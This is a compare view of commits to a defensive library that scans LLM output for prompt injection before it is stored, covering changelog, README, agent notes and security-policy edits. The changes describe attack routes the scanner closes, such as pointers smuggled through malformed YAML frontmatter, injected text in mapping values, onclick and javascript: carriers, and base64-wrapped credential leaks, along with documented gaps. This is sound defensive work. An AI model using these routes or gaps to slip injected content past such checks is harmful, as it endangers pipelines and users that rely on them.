Compare commits
25 commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 0184df9ed9 | |||
| 9aeceb02c0 | |||
| 58704834b6 | |||
| 7cb4553301 | |||
| 01f6f382c4 | |||
| 74656123f9 | |||
| 4472f209a4 | |||
| 2b03b8d643 | |||
| 246e1fc1d3 | |||
| 45c2b06315 | |||
| 869f9058f7 | |||
| ca4f97c8c9 | |||
| da30211bc7 | |||
| 6cd4694613 | |||
| 98ebc07b56 | |||
| e9d8fb2b9d | |||
| ab6000b1af | |||
| aff35118bf | |||
| 2466d260d3 | |||
| c48a2923ac | |||
| 566706360a | |||
| be9759b4b3 | |||
| 72de0e0c15 | |||
| fcfaee4589 | |||
| 0df7e87c2f |
28 changed files with 2459 additions and 281 deletions
245
CHANGELOG.md
245
CHANGELOG.md
|
|
@ -5,9 +5,250 @@ All notable changes to this project will be documented in this file.
|
||||||
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
|
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
|
||||||
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
||||||
|
|
||||||
## [Unreleased]
|
## [1.2.0] — 2026-08-23
|
||||||
|
|
||||||
Nothing yet.
|
### Added — OKF frontmatter can express one mapping form: typed and allowlisted
|
||||||
|
|
||||||
|
`okf.parse_frontmatter` gave the mapping *class* no expressible form at all. OKF
|
||||||
|
v0.2 writes its whole trust and provenance layer as mappings — SPEC.md @
|
||||||
|
`62432a09` uses flow form in its own §5.1/§5.2 examples, and §11 carries a hard
|
||||||
|
MUST for consumers ("MUST treat a bare `verified` mapping as a one-element
|
||||||
|
list") that presupposes they parse. A consumer measured **0 of 53** upstream
|
||||||
|
concepts through the gate on 0.3.4, 1.0.0 and 1.1.0. That was a contract
|
||||||
|
collision, not a calibration setting: no threshold would have moved it.
|
||||||
|
|
||||||
|
Admitted now: a flow mapping (`generated: { by: x, at: y }`), as a value or as a
|
||||||
|
block-list item, whose every key is on a nine-name allowlist (`by`, `at`, `from`,
|
||||||
|
`to`, `id`, `title`, `author`, `usage_count`, `last_modified`) and whose every
|
||||||
|
leaf is a plain scalar run through the *unchanged* dangerous-value and
|
||||||
|
mapping-construct predicates.
|
||||||
|
|
||||||
|
The form is additive and refusal stays the default. A key off the allowlist, a
|
||||||
|
nested collection, a quoted leaf, a duplicate key, an empty or unclosed mapping,
|
||||||
|
and `{a:b}` (which PyYAML 6.0.3 reads as the *key* `a:b`) all raise, and a
|
||||||
|
refused mapping still raises rather than degrading into a string — the 1.1.0
|
||||||
|
defect is not reopened. Nested-block (`k:\n sub: v`), dotted (`k.sub: v`) and
|
||||||
|
inline-second-colon (`k: sub: v`) routes to a mapping still raise, each on its
|
||||||
|
own rule.
|
||||||
|
|
||||||
|
**`resource` is deliberately off the allowlist**, though SPEC.md §5.1 names it
|
||||||
|
inside a `sources` entry. It is a pointer rather than a label and the only key
|
||||||
|
T3 exists for: admitting it would let `executor: { resource: skills/run.md }`
|
||||||
|
carry an executable-code pointer through in typed clothes, which is the door-C
|
||||||
|
route closed in 1.1.0. It costs nothing today — the conformant carrier for
|
||||||
|
`sources[].resource` is a block sequence of block mappings, which this form does
|
||||||
|
not admit either way.
|
||||||
|
|
||||||
|
Mapping leaves are scanned like every other frontmatter value (T1), so an
|
||||||
|
injection parked in `generated: { by: ... }` reaches `scan_output`. Coverage
|
||||||
|
matrix: 130 classes, up from 129 (the new row is the off-allowlist key).
|
||||||
|
|
||||||
|
No exported surface changed; no detector behaviour and no calibration changed.
|
||||||
|
|
||||||
|
|
||||||
|
### Changed — the ReDoS sweep now measures on the same clock as the bounds it justifies
|
||||||
|
|
||||||
|
`docs/redos-sweep.py` timed on `time.monotonic()` while every ReDoS bound in the
|
||||||
|
suite moved to process CPU time (`tests/redos_clock.py`), so the 1.5 ms
|
||||||
|
sensitivity floor and the "~23 s at the cap" figure published in
|
||||||
|
`docs/LIMITATIONS.md` came from a different instrument than the bounds they
|
||||||
|
support. The script now imports `scan_seconds` rather than timing itself.
|
||||||
|
|
||||||
|
The floor was re-derived on that instrument and **stayed at 1.5 ms**: over twelve
|
||||||
|
full runs of all 2585 arms the median ratio is 1.95-2.03 in every size bucket
|
||||||
|
above 50 µs, but two-point excursions past the 2.6 flag threshold persist at every
|
||||||
|
magnitude (p99 ratio 2.9-3.3 even above 1 ms) — 6.9 flagged arms per run at a
|
||||||
|
0.5 ms floor, 1.1 at 1.0 ms, 0.33 at 1.5 ms. Descheduling was never what made this
|
||||||
|
sweep noisy; a ratio computed from two points is. Four arms flagged across those
|
||||||
|
twelve runs, each in exactly one of them, and six arms that have ever flagged
|
||||||
|
re-measure at exponent 0.97-1.09 over six doublings — at most 1.2 s at the
|
||||||
|
1 000 000-char cap. The pattern count the script prints is 152, not the 150 of the
|
||||||
|
0.3.4 entry below; `docs/LIMITATIONS.md` now carries the current number.
|
||||||
|
|
||||||
|
No exported surface, no detector behaviour and no calibration changed.
|
||||||
|
|
||||||
|
|
||||||
|
## [1.1.0] — 2026-08-13
|
||||||
|
|
||||||
|
### Fixed — a mapping construct in OKF frontmatter no longer degrades into a string
|
||||||
|
|
||||||
|
`okf.parse_frontmatter` gives the mapping *class* no expressible form by design
|
||||||
|
(T2). Two routes escaped that: they parsed "successfully" into the wrong **type**
|
||||||
|
instead of raising. Both are closed, and both now `FAIL_SECURE` through
|
||||||
|
`okf.import_bundle` (door C).
|
||||||
|
|
||||||
|
| route | was | now |
|
||||||
|
|---|---|---|
|
||||||
|
| `sources:`<br>` - uri: https://e.com/a` | string `'uri: https://e.com/a'` — WARN | `OKFFrontmatterError` — FAIL_SECURE |
|
||||||
|
| `sources:`<br>` - uri:` | string `'uri:'` — WARN | `OKFFrontmatterError` — FAIL_SECURE |
|
||||||
|
| `attester: resource: attesters/x.py` | string `'resource: attesters/x.py'` — WARN | `OKFFrontmatterError` — FAIL_SECURE |
|
||||||
|
|
||||||
|
The security consequence was the same in each: a pointer parked in a degraded
|
||||||
|
mapping rides through in a key the `resource` allowlist never inspects, and mode-b
|
||||||
|
`import_bundle` writes the merged concept verbatim. The first route was documented
|
||||||
|
at `docs/LIMITATIONS.md:43`; the inline second colon was **found by measurement
|
||||||
|
while closing it**, and is the reason this release names two routes rather than one.
|
||||||
|
Neither shape is conformant OKF — a well-formed bundle does not produce them; a
|
||||||
|
malformed or hostile one can.
|
||||||
|
|
||||||
|
**What closed is the type confusion, not pointer-smuggling as a class.** T3 still
|
||||||
|
inspects `resource` and nothing else, so an honest string under another key rides
|
||||||
|
through exactly as before: `attester: attesters/sql_equality.py` is WARN, while
|
||||||
|
the same path under `resource:` FAIL_SECUREs. The string is still scanned like any
|
||||||
|
other frontmatter value under T1. Nothing about that changed here.
|
||||||
|
|
||||||
|
**The boundary is where YAML puts it**, ground-truthed against PyYAML 6.0.3 rather
|
||||||
|
than reasoned: `": "` and a trailing `":"` are exactly the two shapes where a plain
|
||||||
|
scalar becomes a mapping, and they are refused. A colon carrying neither a space nor
|
||||||
|
a line end opens no mapping — `domain:security` and `https://e.com:8443/a` still
|
||||||
|
parse — and a quoted scalar (`- "uri: x"`) is still a scalar. Quotes are retained
|
||||||
|
rather than stripped; that divergence from YAML is unchanged and now pinned.
|
||||||
|
|
||||||
|
**This is a behaviour change inside the freeze, not a break of it.** No exported
|
||||||
|
name moved. A document that disposed `WARN` on `1.0.0` may dispose `FAIL_SECURE`
|
||||||
|
here — the `1.0.0` entry says exactly this is a fix, not a break. A consumer whose
|
||||||
|
bundles carry an unquoted `": "` in a frontmatter value will now see those concepts
|
||||||
|
refused at import; quote the value, and it parses.
|
||||||
|
|
||||||
|
Suite 792 → **802**: 13 rows added (4 rejected shapes, 7 admitted ones, 2 through
|
||||||
|
`import_bundle`), 3 retired (the two that pinned the defect, and the one-key row
|
||||||
|
in the block-list table). 129/129 classes, 6/6 documented gaps, 35 limitations —
|
||||||
|
all unchanged.
|
||||||
|
|
||||||
|
|
||||||
|
## [1.0.0] — 2026-08-13
|
||||||
|
|
||||||
|
### Changed — the exported Python surface is frozen under semver
|
||||||
|
|
||||||
|
No code changed in this release. `1.0.0` is a governance promise, not a claim that
|
||||||
|
the library is finished: **no name exported from `llm_ingestion_guard` is removed,
|
||||||
|
renamed or given a different meaning without a `2.0.0`.** Measured before the tag,
|
||||||
|
the surface has been stable in form since `0.3.4` — four names added, none removed
|
||||||
|
or renamed — while behaviour moved across five releases (`0.4.0` … `0.7.0`).
|
||||||
|
|
||||||
|
**Detection behaviour is deliberately outside the freeze.** Severities, thresholds,
|
||||||
|
lexicon entries and the dispositions they produce are calibration, and calibration
|
||||||
|
moves in minor and patch releases. A payload that disposes `WARN` here may dispose
|
||||||
|
`FAIL_SECURE` in a later `1.x`; that is a fix, not a break. Assert on the
|
||||||
|
disposition your policy requires, not on a severity you observed.
|
||||||
|
|
||||||
|
The behaviour changes this freeze rests on are not repeated here — see `[0.3.0]`
|
||||||
|
for the active-content gate and the OKF adapter, and `[0.3.1]` for the
|
||||||
|
ordinary-link/image calibration that the two consumer promises pin.
|
||||||
|
|
||||||
|
### Changed — three limitations are conceded for `1.x` rather than deferred
|
||||||
|
|
||||||
|
`docs/LIMITATIONS.md` no longer says "deferred" or "pending" about any of them:
|
||||||
|
|
||||||
|
- `Severity` still carries disposition intent on the detection side. Separating
|
||||||
|
*what was seen* from *how bad it is* changes `Finding` and `Severity`, so it is a
|
||||||
|
`2.0.0` change. Read a finding's `id` for the capability.
|
||||||
|
- The input-cap asymmetry at `MAX_INPUT_CHARS` is permanent in `1.x`: surfaces that
|
||||||
|
return content raise `OversizeInputError`, surfaces that return findings truncate
|
||||||
|
and emit `active:oversize-input`.
|
||||||
|
- The multilingual homoglyph false positive is conceded more narrowly — no fix is
|
||||||
|
promised, but it is calibration, so one may land in any `1.x` release.
|
||||||
|
|
||||||
|
`SECURITY.md` carries all three as documented boundaries and states the support
|
||||||
|
window for a `1.x` line.
|
||||||
|
|
||||||
|
### Known at the freeze, deliberately not blocking it
|
||||||
|
|
||||||
|
`docs/LIMITATIONS.md` §`:43` — an OKF block sequence with exactly one key per
|
||||||
|
element misparses silently in `okf.import_bundle`, so a pointer can ride through in
|
||||||
|
a key the `resource` allowlist never inspects. Closing it tightens what the adapter
|
||||||
|
admits: behaviour, not form, and shippable in a `1.x` minor. It is recorded here
|
||||||
|
because "we knew, and froze first" is a defensible position and "we forgot" is not.
|
||||||
|
|
||||||
|
Runtime coverage at the freeze: `llm-ingestion-okf` has measured `0.3.4` and run a
|
||||||
|
`0.3.4`→`0.6.1` differential on its own door across two Python versions;
|
||||||
|
`llm-security-commons` differentially tested its independent reconstruction of the
|
||||||
|
raw-HTML classifier against ours over 42 probe tags with 0 disagreements. **No
|
||||||
|
external consumer has run the `0.7.0` runtime**; the four symbols added since
|
||||||
|
`0.3.4` are additive, so a caller that does not invoke them is unaffected.
|
||||||
|
|
||||||
|
|
||||||
|
## [0.7.0] — 2026-08-13
|
||||||
|
|
||||||
|
### Added — `active:raw-html-link`, a click-required carrier class for raw HTML
|
||||||
|
|
||||||
|
Raw HTML graded on activity alone: every active tag was HIGH. So the *same URL*
|
||||||
|
was LOW as `[t](https://example.com/guide)` and HIGH as
|
||||||
|
`<a href="https://example.com/guide">` — an asymmetry produced by syntax, not by
|
||||||
|
affordance. Following an anchor needs a human, exactly like the markdown inline
|
||||||
|
link that has been MEDIUM since 0.3.1.
|
||||||
|
|
||||||
|
`<a>` and `<area>` now report as **`active:raw-html-link` at MEDIUM**. Everything
|
||||||
|
a renderer fetches or executes unattended keeps `active:raw-html` at HIGH, and the
|
||||||
|
event-handler test runs *first*, so `<a onclick=...>` is graded as the
|
||||||
|
execute-class carrier it is rather than downgraded with the anchors.
|
||||||
|
|
||||||
|
The URL-attribute branch deliberately stays on the HIGH side: a name outside the
|
||||||
|
active set has unknown rendering, and `href` is not the only URL attribute it may
|
||||||
|
carry. Grading `<Card src="...">` as a link would be reasoning, not measurement.
|
||||||
|
|
||||||
|
**This is a new label, and labels are a contract surface consumers pin against.**
|
||||||
|
A document that previously produced one `active:raw-html` finding may now produce
|
||||||
|
two findings, one per carrier class.
|
||||||
|
|
||||||
|
### Changed — a tag whose whole affordance is a URL it does not carry is inert
|
||||||
|
|
||||||
|
`</a>`, `<Frame>`, `<video />` and `<img alt="...">` without `src` were active by
|
||||||
|
*name* while naming no target at all. This is `<base />`'s argument from 0.6.0 —
|
||||||
|
"attribute-less, therefore no affordance in any renderer" — applied to the rest of
|
||||||
|
the name branch. The test is for the URL attribute's **presence**, not for a
|
||||||
|
readable value: a value the parser cannot resolve keeps the tag active, mirroring
|
||||||
|
the fail-secure gap `_url_attr_is_external` already leaves open.
|
||||||
|
|
||||||
|
Every other member of the active name set does something a URL cannot describe —
|
||||||
|
`<script>` executes its body, `<style>` restyles, `<form>` submits — and stays
|
||||||
|
active with no attributes at all.
|
||||||
|
|
||||||
|
### Changed — `active_tag_class` is the classification point; `is_active_tag` wraps it
|
||||||
|
|
||||||
|
`docs/rawhtml-census.py` measures candidates by patching this symbol, and a
|
||||||
|
boolean could only express a narrowing, never a regrade. Left as a boolean, every
|
||||||
|
carrier candidate would have measured equal to PRODUCTION — silently, and in the
|
||||||
|
direction that reads as "no change helps".
|
||||||
|
|
||||||
|
### Measured
|
||||||
|
|
||||||
|
`docs/rawhtml-census.py`, three populations, each at one corpus state and each
|
||||||
|
against its own denominator — the two wiki corpora share content and are never
|
||||||
|
summed. Documents that stop being `fail_secure` under `PRESET_USER_UPLOAD`, from
|
||||||
|
0.6.0 as shipped to 0.7.0, with the ceiling being the raw-HTML detector switched
|
||||||
|
off entirely:
|
||||||
|
|
||||||
|
| population | documents | 0.6.0 → 0.7.0 | ceiling | share of achievable |
|
||||||
|
|---|---|---|---|---|
|
||||||
|
| reference-corpus | 389 | 54 → 53 | 53 | 1 of 1 |
|
||||||
|
| vendor-harvest | 187 | 62 → 20 | 18 | 42 of 44 (95%) |
|
||||||
|
| generated-notes | 552 | 59 → 15 | 13 | 44 of 46 (96%) |
|
||||||
|
|
||||||
|
**Neither change alone is worth shipping, and the census is why they went out
|
||||||
|
together.** Alone, the split frees 8 documents in each wiki corpus and the
|
||||||
|
narrowing 21 and 23 — but 8+21 measures 42 and 8+23 measures 44. The residual is
|
||||||
|
**13 documents in both corpora**: the narrowing strips a document's `</a>` and
|
||||||
|
`<Frame>`, and what is left is the `<a href=...>` the split grades down, so each
|
||||||
|
change alone leaves the document blocked by the other's residue.
|
||||||
|
|
||||||
|
**Tightening, measured: 0 documents on both trust tiers, in all three
|
||||||
|
populations.** That zero is empirical and thinner than it looks — the split
|
||||||
|
*alone* tightens 13 documents on the trusted tier in vendor-harvest and 14 in
|
||||||
|
generated-notes, and the narrowing cancels each one. See `docs/LIMITATIONS.md`
|
||||||
|
for why it must not be read as "cannot happen".
|
||||||
|
|
||||||
|
The `PRODUCTION (as shipped)` row matched `C1 + D (0.7.0)` field for field in
|
||||||
|
every population, which is the check that the census and the shipped predicate
|
||||||
|
have not drifted apart.
|
||||||
|
|
||||||
|
### Known behaviour change
|
||||||
|
|
||||||
|
**`count` drops on documents containing `</a>`.** Through 0.6.1 an end tag was
|
||||||
|
active by name, so `count` ran roughly 1.6× the opening-tag total and a start/end
|
||||||
|
pair counted 2. It is now the opening-tag total. The field's meaning did not
|
||||||
|
change and the finding count is unaffected — the class still collapses to one
|
||||||
|
finding per class per document.
|
||||||
|
|
||||||
|
|
||||||
## [0.6.1] — 2026-08-11
|
## [0.6.1] — 2026-08-11
|
||||||
|
|
|
||||||
25
CLAUDE.md
25
CLAUDE.md
|
|
@ -11,17 +11,31 @@ framework-agnostisk kode.
|
||||||
Referanse-implementasjon: `claude-code-llm-wiki` Stage B (`tools/wiki_ingest/`).
|
Referanse-implementasjon: `claude-code-llm-wiki` Stage B (`tools/wiki_ingest/`).
|
||||||
Lexikon-seed: `injection-patterns.mjs` fra `llm-security`-pluginen.
|
Lexikon-seed: `injection-patterns.mjs` fra `llm-security`-pluginen.
|
||||||
|
|
||||||
Repoet er på **v0.6 (alpha)**: stdlib-kjernen er bygget og testet (15 moduler +
|
Repoet er på **v1.2.0** — den eksporterte Python-surfacen er frosset under semver
|
||||||
|
(deteksjonsatferd er det IKKE; kalibrering flytter seg i 1.x). Stdlib-kjernen er
|
||||||
|
bygget og testet (15 moduler +
|
||||||
topp-nivå wiring, showcase + korpus), inkl. OKF-adapter og aktivt-innhold-
|
topp-nivå wiring, showcase + korpus), inkl. OKF-adapter og aktivt-innhold-
|
||||||
detektor (EchoLeak-klassen) i output-gaten. Mode-b `import_bundle` skanner
|
detektor (EchoLeak-klassen) i output-gaten. OKF-frontmatterens mapping-klasse
|
||||||
|
har **én** uttrykkbar form (G3, 21.08): en flow-mapping (`generated: { by: x, at: y }`) — som verdi eller som blokkliste-
|
||||||
|
element — der HVER nøkkel står på en ni-navns allowlist og hvert blad er en ren
|
||||||
|
skalar. Formen er trygg fordi allowlisten inspiserer hver nøkkel; det blanke
|
||||||
|
avslaget var håndhevelsen, ikke poenget. `resource` er bevisst UTE av
|
||||||
|
allowlisten (peker, ikke etikett — den ene nøkkelen T3 finnes for). Blokk-,
|
||||||
|
dotted- og inline-kolon-rutene raiser fortsatt, og en avvist mapping raiser —
|
||||||
|
den degraderer aldri til en streng (1.1.0-defekten). Mode-b `import_bundle` skanner
|
||||||
reserverte strukturfiler (`index.md`/`log.md`) i mottatte bundles i stedet for å
|
reserverte strukturfiler (`index.md`/`log.md`) i mottatte bundles i stedet for å
|
||||||
path-avvise dem; upload-front-end beholder shadow-reject (`allow_reserved=False`).
|
path-avvise dem; upload-front-end beholder shadow-reject (`allow_reserved=False`).
|
||||||
Output-gatens decode-and-rescan mater dekodet base64-klartekst gjennom BÅDE lexicon
|
Output-gatens decode-and-rescan mater dekodet base64-klartekst gjennom BÅDE lexicon
|
||||||
og secret-egress (LLM02), så en base64-innpakket credential fanges som
|
og secret-egress (LLM02), så en base64-innpakket credential fanges som
|
||||||
`decoded:egress:*` i stedet for å forsvinne; hex-innpakket er en dokumentert
|
`decoded:egress:*` i stedet for å forsvinne; hex-innpakket er en dokumentert
|
||||||
restgap (entropy eksponerer kun base64-klartekst). `active:raw-html` krever nå et
|
restgap (entropy eksponerer kun base64-klartekst). `active:raw-html` krever et
|
||||||
EKSTERNT mål på URL-attributt-grenen, og `<base>` er ute av det aktive navnesettet;
|
EKSTERNT mål på URL-attributt-grenen, og `<base>` er ute av det aktive navnesettet;
|
||||||
scanner og mutator har hver sin predikat (`is_active_tag` / `is_defangable_tag`).
|
scanner og mutator har hver sin predikat (`is_active_tag` / `is_defangable_tag`).
|
||||||
|
Rå HTML graderes nå også på BÆRER: `<a>`/`<area>` er klikk-krevende og rapporteres
|
||||||
|
som `active:raw-html-link` (MEDIUM), og en tagg hvis hele affordans ER en URL den
|
||||||
|
ikke bærer (`</a>`, `<Frame>`, `<video />`) er inert. Klassifisering skjer i
|
||||||
|
`active_tag_class`; `is_active_tag` er en tynn wrapper, og census patcher den
|
||||||
|
FØRSTE (en boolsk patch kan ikke uttrykke en regradering).
|
||||||
ZWJ (U+200D) dømmes på KONTEKST, ikke identitet — unntas kun mellom to emoji, på
|
ZWJ (U+200D) dømmes på KONTEKST, ikke identitet — unntas kun mellom to emoji, på
|
||||||
begge flater (`sanitize` eier predikatet, `output` importerer det).
|
begge flater (`sanitize` eier predikatet, `output` importerer det).
|
||||||
Start med `docs/BRIEF.md` for design, `README.md` for bruk, `docs/PLAN.md` for
|
Start med `docs/BRIEF.md` for design, `README.md` for bruk, `docs/PLAN.md` for
|
||||||
|
|
@ -46,6 +60,7 @@ When pointing to local files in responses, always use markdown link syntax with
|
||||||
|
|
||||||
Why: bare `file://` URLs only render the first as clickable across multiple lines. Named markdown links make each entry independently clickable and look cleaner.
|
Why: bare `file://` URLs only render the first as clickable across multiple lines. Named markdown links make each entry independently clickable and look cleaner.
|
||||||
|
|
||||||
Example:
|
Example (the path is a placeholder — the checkout root is the reader's own, and
|
||||||
|
this file is published, so it must not carry one machine's directory layout):
|
||||||
|
|
||||||
- [Brief](file:///Users/ktg/repos/llm-ingestion-pipeline-security/docs/BRIEF.md)
|
- [Brief](file:///absolute/path/to/llm-ingestion-pipeline-security/docs/BRIEF.md)
|
||||||
|
|
|
||||||
43
README.md
43
README.md
|
|
@ -2,8 +2,8 @@
|
||||||
|
|
||||||
Write-time defensive layer for Python pipelines that persist LLM output: sanitize, fence, tool-less quarantined transform, capability isolation, scan before persist, fail-secure.
|
Write-time defensive layer for Python pipelines that persist LLM output: sanitize, fence, tool-less quarantined transform, capability isolation, scan before persist, fail-secure.
|
||||||
|
|
||||||

|

|
||||||

|

|
||||||

|

|
||||||

|

|
||||||
|
|
||||||
|
|
@ -33,17 +33,32 @@ at write time, never assumed from the format. Any pipeline ingesting external da
|
||||||
into an agent-read store has this shape; an OKF wiki is its canonical form — which
|
into an agent-read store has this shape; an OKF wiki is its canonical form — which
|
||||||
is why the guard ships a first-class OKF adapter (below).
|
is why the guard ships a first-class OKF adapter (below).
|
||||||
|
|
||||||
**Status:** `v0.6`, alpha. The stdlib-only core — its detector, contract, and
|
**Status:** `v1.2.0`. The stdlib-only core — its detector, contract, and
|
||||||
OKF-adapter modules plus the top-level wiring — is built and tested, exercised by
|
OKF-adapter modules plus the top-level wiring — is built and tested, exercised by
|
||||||
an end-to-end showcase and adversarial + false-positive corpora. The public API
|
an end-to-end showcase and adversarial + false-positive corpora. The exported
|
||||||
may still change. There are real limitations, stated plainly below; read them.
|
Python surface is now frozen under semver: nothing exported is removed, renamed or
|
||||||
|
given a different meaning without a `2.0.0`. **Detection behaviour is not frozen** —
|
||||||
|
severities, thresholds and lexicon entries are calibration and move in `1.x`. There
|
||||||
|
are real limitations, stated plainly below; read them.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Install](#install)
|
||||||
|
- [Quickstart — the two bookends](#quickstart--the-two-bookends)
|
||||||
|
- [OKF / LLM-wiki support (shipped)](#okf--llm-wiki-support-shipped)
|
||||||
|
- [What it protects against](#what-it-protects-against)
|
||||||
|
- [The reusable contract (adopt-this checklist)](#the-reusable-contract-adopt-this-checklist)
|
||||||
|
- [Known limitations](#known-limitations)
|
||||||
|
- [Non-goals](#non-goals)
|
||||||
|
- [Design & threat model](#design--threat-model)
|
||||||
|
- [License](#license)
|
||||||
|
|
||||||
## Install
|
## Install
|
||||||
|
|
||||||
Not on PyPI. The guard is distributed from its Forgejo origin — pin a release tag:
|
Not on PyPI. The guard is distributed from its Forgejo origin — pin a release tag:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
pip install "llm-ingestion-guard @ git+https://git.fromaitochitta.com/open/llm-ingestion-pipeline-security.git@v0.6.1"
|
pip install "llm-ingestion-guard @ git+https://git.fromaitochitta.com/open/llm-ingestion-pipeline-security.git@v1.2.0"
|
||||||
```
|
```
|
||||||
|
|
||||||
The `open/` mirror is anonymously readable, so CI needs no deploy key, token, or
|
The `open/` mirror is anonymously readable, so CI needs no deploy key, token, or
|
||||||
|
|
@ -65,7 +80,7 @@ pip install -e ".[dev]" && pytest # the whole suite
|
||||||
Two consequences worth knowing before you depend on this:
|
Two consequences worth knowing before you depend on this:
|
||||||
|
|
||||||
- A git URL is a PEP 508 *direct reference*: it pins one exact tag, not a range
|
- A git URL is a PEP 508 *direct reference*: it pins one exact tag, not a range
|
||||||
like `>=0.2,<0.3`. Real range pinning — and therefore automatic pickup of patch
|
like `>=1.0,<2.0`. Real range pinning — and therefore automatic pickup of patch
|
||||||
releases — arrives with a Forgejo PyPI registry, which becomes the durable
|
releases — arrives with a Forgejo PyPI registry, which becomes the durable
|
||||||
channel at the first patch release or the second downstream consumer, whichever
|
channel at the first patch release or the second downstream consumer, whichever
|
||||||
comes first. The distribution name (`llm-ingestion-guard`) and the version
|
comes first. The distribution name (`llm-ingestion-guard`) and the version
|
||||||
|
|
@ -150,7 +165,15 @@ Per-concept gates: **path / reserved-name** (rejects `..` traversal and reserved
|
||||||
reject-by-default loader that refuses anchors, aliases, and explicit tags *by
|
reject-by-default loader that refuses anchors, aliases, and explicit tags *by
|
||||||
construction*, so a billion-laughs alias expansion or a `!!python/object` coercion
|
construction*, so a billion-laughs alias expansion or a `!!python/object` coercion
|
||||||
cannot occur (it is deliberately **not** a general YAML engine, whose own features
|
cannot occur (it is deliberately **not** a general YAML engine, whose own features
|
||||||
are the attack surface); **`resource` https-allowlist** (hard-rejects
|
are the attack surface). The one mapping form it accepts is OKF v0.2's flow
|
||||||
|
mapping — `generated: { by: x, at: y }`, `verified: { … }` bare or listed,
|
||||||
|
`usage_window: { from: …, to: … }` — admitted key-by-key against a nine-name
|
||||||
|
allowlist (`by`, `at`, `from`, `to`, `id`, `title`, `author`, `usage_count`,
|
||||||
|
`last_modified`) with plain-scalar leaves only. A key off that list, a nested
|
||||||
|
collection or a duplicate key is refused, and `resource` is deliberately not on
|
||||||
|
it; the block, dotted and inline-colon routes to a mapping still raise. See
|
||||||
|
[LIMITATIONS](docs/LIMITATIONS.md) for what that admits and what it still walls
|
||||||
|
off (a `sources` block list of mappings is still refused); **`resource` https-allowlist** (hard-rejects
|
||||||
`data:`/`javascript:`/`file:` before commit — a reject-gate, not defang);
|
`data:`/`javascript:`/`file:` before commit — a reject-gate, not defang);
|
||||||
**whole-concept scan** (frontmatter *values* + body through `scan_output`);
|
**whole-concept scan** (frontmatter *values* + body through `scan_output`);
|
||||||
**cross-link graph** (surfaces dangling targets, the dormant-injection signal, and
|
**cross-link graph** (surfaces dangling targets, the dormant-injection signal, and
|
||||||
|
|
@ -164,7 +187,7 @@ driven by a **live payload** in the coverage matrix — run it to watch all 134
|
||||||
in your own environment:
|
in your own environment:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
python -m llm_ingestion_guard.coverage # 128/128 classes; exit 0 = all as documented
|
python -m llm_ingestion_guard.coverage # 130/130 classes; exit 0 = all as documented
|
||||||
```
|
```
|
||||||
|
|
||||||
| Anchor | Attack classes it stops (representative) |
|
| Anchor | Attack classes it stops (representative) |
|
||||||
|
|
@ -246,7 +269,7 @@ a green scan means safe content. The highest-impact items:
|
||||||
two of the three corpora are living, so the cells are not rewritten in place.
|
two of the three corpora are living, so the cells are not rewritten in place.
|
||||||
Method and before/after: [`docs/rawhtml-census.py`](docs/rawhtml-census.py).
|
Method and before/after: [`docs/rawhtml-census.py`](docs/rawhtml-census.py).
|
||||||
|
|
||||||
**Full list — 34 items, each with the mechanism, plus the out-of-scope boundary:**
|
**Full list — 44 items, each with the mechanism, plus the out-of-scope boundary:**
|
||||||
[`docs/LIMITATIONS.md`](docs/LIMITATIONS.md). Several carry field measurements from
|
[`docs/LIMITATIONS.md`](docs/LIMITATIONS.md). Several carry field measurements from
|
||||||
consumer corpora, including the false positives the URL-shape rule actually produces.
|
consumer corpora, including the false positives the URL-shape rule actually produces.
|
||||||
|
|
||||||
|
|
|
||||||
39
SECURITY.md
39
SECURITY.md
|
|
@ -6,21 +6,31 @@ downstream corpus. Reports are welcome.
|
||||||
|
|
||||||
## Supported versions
|
## Supported versions
|
||||||
|
|
||||||
The project is pre-1.0 (`0.6.x`, alpha). Only the latest published version receives
|
The project is `1.x`. Only the latest published version receives fixes; there are no
|
||||||
fixes; there are no back-ported security branches yet. Pin a version and watch the
|
back-ported security branches. Pin a version and watch the `CHANGELOG.md`
|
||||||
`CHANGELOG.md` `### Security` entries.
|
`### Security` entries.
|
||||||
|
|
||||||
|
**What `1.0.0` freezes, and what it does not.** The freeze is a semver promise about
|
||||||
|
the *Python surface*: no name exported from `llm_ingestion_guard` is removed, renamed
|
||||||
|
or given a different meaning without a `2.0.0`. It is **not** a promise that detection
|
||||||
|
behaviour holds still. Severities, thresholds, lexicon entries and the dispositions
|
||||||
|
they produce are calibration, and calibration moves in minor and patch releases — a
|
||||||
|
payload that disposes `WARN` on `1.0.0` may dispose `FAIL_SECURE` on a later `1.x`,
|
||||||
|
and that is a fix rather than a break. Pin a version if you depend on a specific
|
||||||
|
grading, and assert on the disposition your policy requires rather than on a severity
|
||||||
|
you happened to observe.
|
||||||
|
|
||||||
## Reporting a vulnerability
|
## Reporting a vulnerability
|
||||||
|
|
||||||
**Do not open a public issue for a vulnerability.** Public disclosure before a fix
|
**Do not open a public issue for a vulnerability.** Public disclosure before a fix
|
||||||
gives an attacker a window against every downstream consumer.
|
gives an attacker a window against every downstream consumer.
|
||||||
|
|
||||||
Instead, report it **privately** to the maintainer via the canonical repository on
|
Instead, report it privately to <security@fromaitochitta.com> — mark the subject
|
||||||
Forgejo:
|
`SECURITY`.
|
||||||
|
|
||||||
- Repository: `git.fromaitochitta.com/open/llm-ingestion-pipeline-security`
|
- Canonical repository: https://git.fromaitochitta.com/open/llm-ingestion-pipeline-security
|
||||||
- Contact the maintainer directly through that Forgejo instance (private message /
|
- Alternatively, contact the maintainer directly through that Forgejo instance
|
||||||
maintainer contact) and mark the subject `SECURITY`.
|
(private message / maintainer contact) and mark the subject `SECURITY`.
|
||||||
|
|
||||||
Please include:
|
Please include:
|
||||||
|
|
||||||
|
|
@ -50,7 +60,18 @@ Out of scope (documented boundaries — see the **Known limitations** section of
|
||||||
- a HIGH finding in *trusted* prose disposing to `WARN` (§4.7 trust-scaling);
|
- a HIGH finding in *trusted* prose disposing to `WARN` (§4.7 trust-scaling);
|
||||||
- hex-wrapped (non-base64) secret egress;
|
- hex-wrapped (non-base64) secret egress;
|
||||||
- multimodal / binary-layer carriers (OCR, font stego, VBA/macros, encrypted files);
|
